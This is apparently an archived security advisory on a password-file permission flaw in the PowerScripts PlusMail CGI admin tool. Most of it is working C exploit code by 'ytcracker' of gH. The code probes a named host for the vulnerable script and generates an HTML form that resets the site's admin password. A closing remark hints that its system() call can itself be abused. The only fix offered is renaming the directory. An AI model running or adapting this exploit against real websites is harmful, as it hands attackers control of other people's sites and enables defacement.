COMMAND

    PlusMail

SYSTEMS AFFECTED

    PowerScripts PlusMail (All versions to current)

PROBLEM

    YT Cracker found  following (gH Security  Advisory).  Plusmail  is
    an  extremely  popular  cgi-based  administration tool that allows
    you  to  take  control  of  your  website with a graphical control
    panel  interface.   The  password  file,  however,  is  set   with
    permissions rw enabled, therefore granting the authority to change
    the password whenever's  clever.  The  following code will  detect
    the vulnerability and generate the required html to exploit.

    Noticed  plusmail  running  on  multiple  operating  systems.  The
    vulnerability  lies  in  the  web  based  tool,  which now that is
    easily  exploited,  gives  you  "ADVANCED  CONTROL"  of  a  target
    website.   Below   is  the   code  by   ytcracker  of   gH,  which
    demonstrates how  easy it  is to  generate the  html code which is
    executed by your  web browser to  compromise the target  host.  It
    was noticed  this PlusMail  program is  widely used,  but have yet
    to succeed in  finding the main  site for PlusMail  to acknowledge
    the developers of the remote vulnerability.

    Most likely  this will  be ripped  out during  the online trading,
    because of script kids not likely this factual addition, but never
    the  less,  it  will  be  expressed.   This exploit was written to
    acknowledge security weaknesses, but  in no way promotes  web page
    defacments.   If you  further use  this program  to gain access to
    anything not normally accessable  by yourself, meaning you  script
    kids, then you are subject to be prosecuted and even get 10  years
    in prison.  Is  it honestly worth it  to compile this program  and
    randomly  ./hack  sites  and  deface  them  with  this  half   way
    automatted program to put your nick & group on it?  The answer  is
    NO.

    */
    
    #include <stdio.h>
    #include <string.h>
    #include <netdb.h>
    #include <ctype.h>
    #include <fcntl.h>
    #include <strings.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <signal.h>
    #include <arpa/nameser.h>
    #include <sys/stat.h>
    #include <sys/socket.h>
    
    int main(int argc, char *argv[])
    {
	    int sock;
            unsigned long vulnip;
    
	    struct in_addr addr;
	    struct sockaddr_in sin;
	    struct hostent *he;
    
            char *detect;
	    char buffer[1024];
	    char plusvuln[]="GET /cgi-bin/plusmail HTTP/1.0\n\n";
	    char htmI[]="<html><head><title>[gH plusmail exploit]</title></head><form action=\"http://";
	    char htmII[]="/cgi-bin/plusmail\" method=\"post\"><p>username: <input type=\"text\" name=\"username\"><br>password: <input type=\"password\" name=\"password\"><br>retype password: <input type=\"password\" name=\"password1\"></p><p><input type=\"submit\"
    name=\"new_login\" value=\"reset password\"></p></form><p><a href=\"http://pure-security.net\">Pure Security Networks</a></p></body></html>";
    
            FILE *html;
    
	    printf("\n [gH plusmail exploit] [ytcracker] [phed@felons.org]\n");
    
	    if(argc<2)
	    {
		    printf(" usage: %s [vulnerable website]\n\n",argv[0]);
                    exit(0);
	    }
    
	        if ((he=gethostbyname(argv[1])) == NULL)
	    {
		    herror("gethostbyname");
		    exit(0);
	    }
    
	    vulnip=inet_addr(argv[1]);
            vulnip=ntohl(vulnip);
    
	    sock=socket(AF_INET, SOCK_STREAM, 0);
	    bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
	    sin.sin_family=AF_INET;
	    sin.sin_port=htons(80);
    
	    if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
	    {
		    perror("connect");
	    }
    
	    send(sock, plusvuln,strlen(plusvuln),0);
	    recv(sock, buffer, sizeof(buffer),0);
	    detect = strstr(buffer,"404");
	    close(sock);
    
	    if( detect != NULL)
            {
		    printf(" vulnerabilty not detected.\n");
                    exit(0);
            }
	    else
		    printf(" vulnerability detected.  generating html...\n");
    
	    html=fopen("plus.html","w+b");
	    fprintf(html,"%s",htmI);
	    fprintf(html,"%s",argv[1]);
	    fprintf(html,"%s",htmII);
            fclose(html);
    
	    printf(" spawning lynx...\n");
    
            system("lynx plus.html");
	    return 0;
    }

    The system() calls will allow you to exploit the exploit execv()>*

SOLUTION

    Move/rename the PlusMail directory as a temporary fix.